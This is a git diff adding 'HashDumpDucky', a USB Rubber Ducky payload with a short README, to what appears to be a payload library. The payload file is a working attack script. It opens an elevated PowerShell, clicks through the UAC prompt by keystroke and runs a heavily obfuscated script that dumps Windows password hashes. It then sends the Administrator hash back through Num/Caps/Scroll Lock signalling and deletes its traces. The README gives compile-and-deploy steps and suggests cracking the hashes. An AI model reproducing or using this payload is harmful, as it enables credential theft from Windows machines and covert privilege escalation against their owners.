diff --git a/payloads/library/exfiltration/HashDumpDucky/README.md b/payloads/library/exfiltration/HashDumpDucky/README.md new file mode 100644 index 0000000..b99a013 --- /dev/null +++ b/payloads/library/exfiltration/HashDumpDucky/README.md @@ -0,0 +1,22 @@ +**Title: HashDumpDucky** + +

Author: 0iphor13
+OS: Windows
+Requirements: DuckyScript 3.0
+Version: 1.0

+ +:bangbang: | This is just meant to be a PoC, as this method of Hashdump will result in empty, default hashes on recent versions of Windows. + +**Instruction:** + +Bring some time... This payload will run an obfuscated script to dump user hashes and exfiltrate the Administrator hash via Keystroke Reflection Method. + +# +**Instruction:** + +Compile this payload with payloadstudio, place it inside of your Ducky as inject.bin and you are good to go +# +Exfiltrate the out.txt file and try to crack the hashes. +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/tree/master/payloads/library/credentials/HashDumpDucky/hash.png) + +*props to Nikhil Mittal* \ No newline at end of file diff --git a/payloads/library/exfiltration/HashDumpDucky/hash.png b/payloads/library/exfiltration/HashDumpDucky/hash.png new file mode 100644 index 0000000..7ec52f5 Binary files /dev/null and b/payloads/library/exfiltration/HashDumpDucky/hash.png differ diff --git a/payloads/library/exfiltration/HashDumpDucky/payload.txt b/payloads/library/exfiltration/HashDumpDucky/payload.txt new file mode 100644 index 0000000..f6e8156 --- /dev/null +++ b/payloads/library/exfiltration/HashDumpDucky/payload.txt @@ -0,0 +1,36 @@ +REM HashDumpDucky +REM Version 1.0 +REM OS: Windows +REM Author: 0iphor13 +REM Requirements: RubberDucky mk2/DuckyScript 3.0 + +REM PoC of dumping hashes, filtering for the Administrator hash and exfiltration via keystroke reflection. + +ATTACKMODE HID +LED_OFF +DELAY 2000 +SAVE_HOST_KEYBOARD_LOCK_STATE +$_EXFIL_MODE_ENABLED = TRUE +$_EXFIL_LEDS_ENABLED = TRUE + +REM Dump the user hashes and filter for the Administrator hash +GUI r +DELAY 1000 +STRINGLN powershell Start-Process powershell -Verb runAs +DELAY 1000 +REM Shortcut for pressing yes on the UAC pop-up - for english keyboard layout use "ALT y" +ALT j +DELAY 1000 +STRING & ( $vERBOSePrefeRENCE.tOStrING()[1,3]+'X'-JoiN'') (( [ReGEX]::mATcHES( "NoISSErPXe-EKoVnI| )63]rAhc[,93]rAhc[ f-)' )(dnEOTDAer.))Iic'+'sA::]gniDoCnE.TXet.mETsyS['+' , ) )sSERPMOcED::]eDOmnOisSERpMoC.nOISsERPMoc.OI[,) }0{=Mg/dBFIZtFbQsuDc'+'iWdwqfq+j'+'TifWYWVkvIY1ZglTlFbaaSbaHuWEOzKyPlif'+'1ySGkmnV7lP/pfAfp1CLtBTP6VcBvuTQyCp4g8ssbFhONWOd3Ol73MheJJFBggxaaBofxzHzWFIy/dcCJ3dU4wZ+G+kk1uK/uyeB'+'7ThEx1ZQwV9wQfEm6fBHHuHi7wc4lVJWSxByZX1H0fya5WFswzM08o9eej+CP/3fKpWBwsmVyfpbbCeGJ'+'fi'+'m/xvrl'+'qb06zQMeSh3P+PVo'+'UFyHtfNhzDwAbvNLYEP'+'/VZRxbEnEAQ6Hxf/LFbYwkE/9bpiMc7Ih8+DkF3h2dLfdxGxMuHwWKyHmwKT9i2fAs8L/Sdkc+rF/c+UC+uVg6//22rhH'+'4GKB+ZSnS8PE'+'yXtbsdTRxAxtGDggf'+'6c4+AseZ4/v9k71//sRRzo1hkatyDmImrPtMXrOK8j9QP7gvabYjaWzbmNgt7nVF2nPjFwU0W7ZL3miFrdtB42Ub6Y30U4iFkez7vzuPgNAAr/N798acla'+'A/kayIwTeKxb2nUEuSI8uI'+'ef5ciCk3UVqgldjgCBjuEvLoIPdLaWEh2d83sv69oMnANzdAvUDoWAyYSCN'+'GkDq0K0mo3L863'+'6+hYZlxv58K'+'ekvjaqRKL+r9UNg+CNPbjDI'+'8EEQ8X4RhvVRqp9+xwES+99Qxj'+'XCs++eiDOmJqb/F'+'F0Ul53WgVRJs2ygs2HX2vH6ylG+HFTaQjL3D77+Ta2dqWP8gaZdM+XzYea'+'jV2G20fj9CG64Xtx'+'TvSLCJW81PCGWfngA9Pu8Sr/4wc7MdNopCXW'+'sC8tPZ6Tv'+'CuK5W69IS9BY'+'mnud75Y9M3LD9B2'+'N8+AHxPK'+'0bexx'+'VpQ2TTgV8l6My3IFRrnfqOQR'+'L0dxm4cW11b6Dr8K96EUtOq2iiK70eRVIIoA+WrzBIhRs5FIkaF7UR/616e7X7IXu8oJi601TXQp8cVAg2'+'5zdQRCHMFhMAamFtZ5WNYzaoUHXa1Jnb2aMG'+'4LXZZnzMjLq9PdlkxXcK8bDFcwKwwKl6dasC7jjY2NflfmSBGkWw9kmcY8KyeV3gDZeENCkOX5f2t4TemRW0'+'O8K2cek/qRX8ticj1MyuYiCIyWF+DF/hMnaCl+X/yu5'+'s163DPu1'+'xg6/F0ukzONsrISvivKGtWkVwNqgWV2JQBKx9+'+'uFyrbVCuoKYxEO3TDqRWj1HMl73bnk8x1xJSWp5'+'b'+'/Oq'+'bkNbaYBHKXmJFfeX2X3oAs'+'SB3WQ'+'cYJzfcyIetnB17QUrd9AhE'+'Fadov2i39ui1renPC+IZ9KDRy3T6iH2wJ1aPnRTfmHCbZcFwpYswWQpN'+'VAfTS9Xf'+'bttx9D+uxlJjTvupkY8HP9mTL+kO4TK6Q9ieEoPAYX'+'183UHAzRy2emkrRVtSsb8BeX'+'2vadQBIXFsRMVAg/NVK8fCqmgDvP97/Wwk'+'cbReDVO25WS0XRxhczhN8trF'+'bg9D2TbmEVcINVBwvireEo'+'6jWiHMpwed0x3+FJH/JOf1q22p8HOx9trgsf7m7ef'+'03'+'/Fxdo6A3eq0X2'+'zQ+320P4mWtcxS'+'1VIzirtITRDYZddAzuQ/Yuu0xpIVUPTER4'+'cK0MD2hPFtwxsxPhbatrYsnapQrWO1C+744LFxKr0/DJoBfsIXuqTWTaJv'+'5YpZMlCeaNSc9EU0fmUO74KIGzpNBVlEdJLKN'+'xIZS44gO'+'e+LTB9Jo'+'gwj+4/rWlQzF2z0q1EkUm0JSPfR9HXfrTtCT31Ia6q38gS3Fsbm+9r7Pv/oyowvp+wm15Of7XwLv72/HfjqCK/864//dyff9l1vsfPJ99Ct/fymu7trXKg3chQZ7RtNG3MHr3V5BhS7wivkOVBo/GVMvyTHCg/'+'Zsp+SP2n7G2ctBB24gN6YjLb2wGTsxFbAQzGaGwGLsxBvNd6Oc75WJTgGjRjODKO7+q9+Fhab4Dpj+eKasxmF9kgU7XQs+lNi/Rl8FTqJZ8e6'+'F+KX8ZOuSCM24H6fOmsvq6MzeTqhKPtxzo7P2zfcJ59R+HCloIJFALy7jLP56j/OqGfqZ'+'ayAhbobz5h8Iange69zvOvIpWxMrRjf54Kpcb/CwLC9V/9'+'Hs5ZqX+Y2a'+'1dfAIOyuldJdFfHyQ2T'+'FnbD4SNeo5A'+'anhVUgDpKRuDDOvQtl1S2m3az6Fmhxupbj2nSMoj72JP3WzoYElqZkU63iJuK0vGU2'+'aMNzz7tp2KRNbH+Fa1vkRjBOePjOd'+'zmfHtsU0'+'03vV5tgkxPi51kdpEAbIuSXmaWGUnmMfSF9'+'H3mAEBcC0U1TjTsIDXnkZrav/RJ8kwoggTAK7ZG+ZAvMdHnBzIO+mVbkmgSt2eQe1AVME7'+'fXx3fvrPapQWd0jt'+'sC24XQ593yL024GZm8Y'+'7+bSiRGszaKovH7YDP5qL2SHd31W/alE350wFttaC6llA/bPx+utmkNa'+'LNxMNCXkMcR47jeekyEezVoLeRApRZLeU45wtPL4z2IS/qgIJHSrr'+'ksxcnMdnYy7zZAGvR1'+'Unm'+'CWvRFXMBF6J3ZFaBE6UAI'+'vs0ehSv/Y'+'heOZgxskiyP7BGlJ+QfhKsf'+'G5MNJv'+'2rkpAjwvGBwEcB2'+'v9c30P4zYf'+'922FZzBqfg5D2rM89nNCJzVtgOAmFx8+Vx/l7lsmxmH3Vlu6YA9VSHt'+'YhnK/AXhBxs2V5UJA2e4S1shm/HtHo'+'ed6Vn9NrxdFnw47NJEhnKMSG+JHzzcich'+'NJlqWD2SGdApJUcAvnROYLiY8OBn9KtkBzylCw5ALneVj+APBldEhX1WE/xZ7RsL3Honwej8EBUY3qOc7wcTZvOPdRLvkiE8Jn/qDwuIBpn3GyS'+'1GrGYLF6F'+'azND9WDKSe+shX6gs+zMsb0TPWL3e1bk3QYOQY/uSKvJOLiOxVFxXuzqrBPLnYI'+'5yJce76Thz0Sj+y55M+XusVFtsp3Um8BtJ9lMKtZdTSlpyizsPRy66scOPVMbeEBlpTGwC5Jx'+'PH'+'iKC7NnC/Zgsg3tMrMW2O'+'54LKP58qJYHFEdVo5peQENSTt/3u2CDv7/igbFh/MofBI5O7jZkpzhN/lJ2jl'+'xH9F10nwPpf0'+'gi'+'rjRGt'+'H1q7l9FNULrtPK/5DJ/zDVeYKhMxrMVUC4LuSBhCCt4bqgLy5XzUQ7PpTeGx+I0XrLoEPGvaDTwzkx5tpZJhbVCuLe'+'KmKO'+'uiZbFYlbg1dHyO3'+'dJvTF7XFyR3wJbp7JCEUonN9wlj/tk7DurgKC2fS0xfS0xfg4HQ35cMOX6BEBq4QPiPz61wCnj4lsOFKZ'+'bKoT9NqdDFITbNIG2Aw6'+'SuP'+'QlC2JB78'+'kEHK4tvy05Xwm'+'I43x'+'uvg'+'xkfKM'+'OH9NjZHK5kTYBF4oEU3kOg5c05FhPaOp7FHealLsmAhVUe5NACbSSA/LlAa7CaI6MKB1'+'r+NRR+PWzj2iXfcHlSOGGYei7IZiW0Mh5mgheLJJmxqgr7muf4Zz+P0bD6f2I8PsE'+'MhljhMvkWaZltXMK/SLBps'+'HdFWOHFg'+'/VwYmk8KSdy'+'TsLuOVv8Xft4/kdvrW2J'+'H9YrLbdYjFXCSMuAkYcBIx3GciyNKE/mWbp5NnpSo5AZR+JpX2IS'+'jg'+'lTdFoisKMJI5qvQLUbwRdie5Df6ZqL3pH5iV5UmO4hc+MyFWFvG9lTx5gYaOlhV5rX3oTYCOuhKf'+'IgieCiAZWkFke1LHYGzgVlCB0UMKYS6FFxyoU0qRhMjoS4tasa0E4SVtQDWVVH'+'UY5jZiML56wUK1zM1uah0PItJW'+'xrMdQdo68JMwZtzKHbHLbNn5dlr2CC25zqVcwdRwGGvZVbdO'+'k4eS0FuJbaPoRNlUFMBZRWhKUqaq4a5UqADKYTpiqdPCYjJ2YgN6sL5yIXmZQq7x0f7W9yQ9'+'qD/AQONQ6rP9l1bJmRf'+'dYm+26CYXBH9lFQCq'+'Ub4tO14HUfd0O2NNJi7HT+4Sd3JDIzlDMbdp9Fgy5jm54dnWuuHHKqrnsge4UYOnxjXhHaCDHBDD6jD9xFWwD'+'KBxHQJFGkDdxFWyHqBmwgx4QT88BUeBmwBag98oPekFcgZMkAkU'+'vZtheAUpRP8oTawIY'+'yAKMIH6iHcimOgyIUEMMofO0BH6'+'gHMimGAgDLBzHQJFYJXYO7ph9xhe4AL4C/I0dZuC9xhe4QH'+'ch5sjG2HH6mis'+'FcIlUgZclOoPO2DHYJHYEPFAPgNG5F0RjuoDMgheglB9xhe4Q'+'n8o0ZEdUsGoAP2jHZBHYGnp6Sh+o0NAih'+'MFYJXYOHoh9xhe4A'+'L4CHJw6'+'zSgAN2lHZBHYG3phC4xeo4RCgusFYAHqjOYxs8oHekBcgG6MCJLsE4RjuoDMkj0B/5Re4YHU4GhCjMEQA8MoXe'+'0DP6gOQHMgBTy3GGKoAL5D3Zd/90t0v3fF9K61gPSb7grmlokodpa0fA9YvzOLttnwTH054lHz6i8oJDLiuu3jA/1kMHOQvLLOaa0K1tod9rY8JNEYr2PdshCwb3YBZmZEe9W1eTbtq9'+'KfZPYIzw3cyJ/JIO'+'/v7snNnvKPU1Qa9J+q7u+9rBO513e4JdkE0R0c7cGZH+oLRtH65Chgnk8'+'LWq9nDGYvyjXfQ2KkciYj8gaK7w9mJ0P+HiyuO4V/L5M67t'+'f/PJG+dYj4ub'+'m8jp5BkHiZF'+'SyYpCZZ4BV87a1HbH'+'nV+2oKgykT6I3mjdKC+tvCaOsPzNMkF29bD'+'BpbSeKfmsoMtb8XhNGfh+NZfDf9rVg'+'n7GyR0lumNz7m3mJcrZ8Dev/LFwjDpLJ28t4H94/ylChWqRD2mv'+'Io96Qx3lybWw+rbbjzot9P39sZr19oMSuRFUZP0yGqE+JTAH8HniHV53zY+EhTC36izhL1MEtOVDP5BXBO+4luy4d1I4eoAmjCH+tw8v'+'Nn'+'KbQ6lxd0lEBdyOplJxpfZb0oZzQMbxe+OC1tvplQelWWV7QMdEjtmHSC'+'nkxVDqBYQWk/od'+'TBKrSwsuVPfP27'+'7GTe8soEpX4'+'EpJyicbiDCjHu7k950t'+'/x0xIahI'+'U7MqkeJ8+PBfHlJlK8uxgswgQMnw0'+'DrRRrJt'+'JP'+'lxYAyHRGj'+'JkZ5+'+'zQGoT41ZiG'+'VicPJhEttJySykOjCBNA5vZ9u9k7'+'Cp3JUzuNjsr2/HBMqC6FJZQ3dmF2NnbJ2ZcH/WolSz5+ambdxOuCYeywUzurfbOzMXlbaIpH3eqyrUa'+'jt443JkLSrYMGbeYoR9EqBPwHLBH0pDJ7eejjOITSKvs+BBWSvp1FxQ'+'q0EGsu'+'gP5F4OZHv9nhBSkU00w'+'7vvJLs9KH+hX4yHeGbkxOpeqtvJ3jz0CVvf2GB57zXDZHjRfpq8EuT2VazKhi7eji4kI9tZvpxnl9bkem12o'+'/QQui/vf41b7wdfbPoDQCH/JC82n8'+'81Vfv'+'xBiIZI/OIoRyT4'+'GThT59V264NRsLlI9266SdCz2nX'+'HDueSiwzg90T39Ej+gx4byvedXd1U2ZHEAC8M9ct7+z3+SAItIQUWYEy0iWp1JvsPnMmevzmtqUqdedplSaTGsTL43pcq78vEIt5c7tV7}0{(GNIRTS46EsaBmoRf::]tREvNOC.mEtsyS[]'+'MaERTs'+'YrOMEm.oI[(mAe'+'RtSeTAlFed.noiSSERpMoC.Oi tcEJBo-wEn ( (REDAerMAertS.oi '+' tcEJBo-wEn()}0{X}0{+]31[DILLEHs}1{+]1[DillEHs}1{ (. '((",'.' ,'RIGHTtO'+'LeF'+'T')-JoIN '' )) > output.txt;cat output.txt | Select-String Admin > admin.txt;rm output.txt; +DELAY 500 +REM Exfiltrate the Admin hash via Keystroke Reflection +STRING foreach($b in $(cat admin.txt -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}';echo $o >admin.txt; +DELAY 500 +STRINGLN $o=(cat admin.txt);Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o);rm admin.txt;clear;echo "Administrator hashes exfiltrated!";Start-Sleep -s 3;exit +DELAY 1000 + +REM The final SCROLLLOCK keystroke indicates EXFIL is complete. +WAIT_FOR_SCROLL_CHANGE +LED_G +$_EXFIL_MODE_ENABLED = FALSE +RESTORE_HOST_KEYBOARD_LOCK_STATE \ No newline at end of file